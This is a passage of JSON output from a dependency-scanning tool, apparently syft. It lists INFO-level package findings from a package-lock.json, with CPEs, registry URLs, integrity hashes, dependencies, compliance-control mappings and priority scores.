"severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6285de3b3f3c2477", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: firebase-admin 12.7.0", "title": "firebase-admin 12.7.0", "description": "Package discovered: firebase-admin 12.7.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "01aea657af389bb4", "name": "firebase-admin", "version": "12.7.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:firebase-admin:firebase-admin:12.7.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:firebase-admin:firebase_admin:12.7.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:firebase_admin:firebase-admin:12.7.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:firebase_admin:firebase_admin:12.7.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:firebase:firebase-admin:12.7.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:firebase:firebase_admin:12.7.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/firebase-admin@12.7.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/firebase-admin/-/firebase-admin-12.7.0.tgz", "integrity": "sha512-raFIrOyTqREbyXsNkSHyciQLfv8AUZazehPaQS1lZBSCDYW74FYXU0nQZa3qHI4K+hawohlDbywZ4+qce9YNxA==", "dependencies": { "@fastify/busboy": "^3.0.0", "@firebase/database-compat": "1.0.8", "@firebase/database-types": "1.0.5", "@types/node": "^22.0.1", "farmhash-modern": "^1.1.0", "jsonwebtoken": "^9.0.0", "jwks-rsa": "^3.1.0", "node-forge": "^1.3.1", "uuid": "^10.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a972164b3d990123", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: follow-redirects 1.16.0", "title": "follow-redirects 1.16.0", "description": "Package discovered: follow-redirects 1.16.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a8847fd98501e6bd", "name": "follow-redirects", "version": "1.16.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:follow-redirects:follow_redirects:1.16.0:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/follow-redirects@1.16.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.16.0.tgz", "integrity": "sha512-y5rN/uOsadFT/JfYwhxRS5R7Qce+g3zG97+JrtFZlC9klX/W5hD7iiLzScI4nZqUS7DNUdhPgw4xI8W2LuXlUw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a2e20f1dd4ff167a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fontkit 2.0.4", "title": "fontkit 2.0.4", "description": "Package discovered: fontkit 2.0.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "83c2ace663a40ea8", "name": "fontkit", "version": "2.0.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fontkit:fontkit:2.0.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fontkit@2.0.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fontkit/-/fontkit-2.0.4.tgz", "integrity": "sha512-syetQadaUEDNdxdugga9CpEYVaQIxOwk7GlwZWWZ19//qW4zE5bknOKeMBDYAASwnpaSHKJITRLMF9m1fp3s6g==", "dependencies": { "@swc/helpers": "^0.5.12", "brotli": "^1.3.2", "clone": "^2.1.2", "dfa": "^1.2.0", "fast-deep-equal": "^3.1.3", "restructure": "^3.0.0", "tiny-inflate": "^1.0.3", "unicode-properties": "^1.4.0", "unicode-trie": "^2.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0277ddadc8ca9fad", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: foreground-child 3.3.1", "title": "foreground-child 3.3.1", "description": "Package discovered: foreground-child 3.3.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "be5a9ebbd8259fbe", "name": "foreground-child", "version": "3.3.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:foreground-child:foreground-child:3.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:foreground-child:foreground_child:3.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:foreground_child:foreground-child:3.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:foreground_child:foreground_child:3.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:foreground:foreground-child:3.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:foreground:foreground_child:3.3.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/foreground-child@3.3.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.1.tgz", "integrity": "sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==", "dependencies": { "cross-spawn": "^7.0.6", "signal-exit": "^4.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f31639275e9af4b4", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: form-data 2.5.5", "title": "form-data 2.5.5", "description": "Package discovered: form-data 2.5.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "cccf1222c38fa883", "name": "form-data", "version": "2.5.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:form-data:form-data:2.5.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:form-data:form_data:2.5.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:form_data:form-data:2.5.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:form_data:form_data:2.5.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:form:form-data:2.5.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:form:form_data:2.5.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/form-data@2.5.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.5.tgz", "integrity": "sha512-jqdObeR2rxZZbPSGL+3VckHMYtu+f9//KXBsVny6JSX/pa38Fy+bGjuG8eW/H6USNQWhLi8Num++cU2yOCNz4A==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.8", "es-set-tostringtag": "^2.1.0", "hasown": "^2.0.2", "mime-types": "^2.1.35", "safe-buffer": "^5.2.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f04370c9bd4302d0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: form-data 4.0.5", "title": "form-data 4.0.5", "description": "Package discovered: form-data 4.0.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fb8802f2379acb63", "name": "form-data", "version": "4.0.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:form-data:form-data:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:form-data:form_data:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:form_data:form-data:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:form_data:form_data:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:form:form-data:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:form:form_data:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/form-data@4.0.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz", "integrity": "sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.8", "es-set-tostringtag": "^2.1.0", "hasown": "^2.0.2", "mime-types": "^2.1.12" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "309869a00f00319d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: forwarded 0.2.0", "title": "forwarded 0.2.0", "description": "Package discovered: forwarded 0.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e972502f7a8ea944", "name": "forwarded", "version": "0.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:forwarded_project:forwarded:0.2.0:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/forwarded@0.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz", "integrity": "sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f433c70fa1fc6314", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fraction.js 5.3.4", "title": "fraction.js 5.3.4", "description": "Package discovered: fraction.js 5.3.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f45608cb782e3ae1", "name": "fraction.js", "version": "5.3.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fraction.js:fraction.js:5.3.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fraction.js@5.3.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fraction.js/-/fraction.js-5.3.4.tgz", "integrity": "sha512-1X1NTtiJphryn/uLQz3whtY6jK3fTqoE3ohKs0tT+Ujr1W59oopxmoEh7Lu5p6vBaPbgoM0bzveAW4Qi5RyWDQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9a535c2456d85e31", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fresh 0.5.2", "title": "fresh 0.5.2", "description": "Package discovered: fresh 0.5.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7908a3419570e85d", "name": "fresh", "version": "0.5.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fresh_project:fresh:0.5.2:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/fresh@0.5.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz", "integrity": "sha512-zJ2mQYM18rEFOudeV4GShTGIQ7RbzA7ozbU9I/XBpm7kqgMywgmylMwXHxZJmkVoYkna9d2pVXVXPdYTP9ej8Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2b4f03d780920bbf", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fsevents 2.3.3", "title": "fsevents 2.3.3", "description": "Package discovered: fsevents 2.3.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "585a401b2834ec08", "name": "fsevents", "version": "2.3.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fsevents:fsevents:2.3.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fsevents@2.3.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { 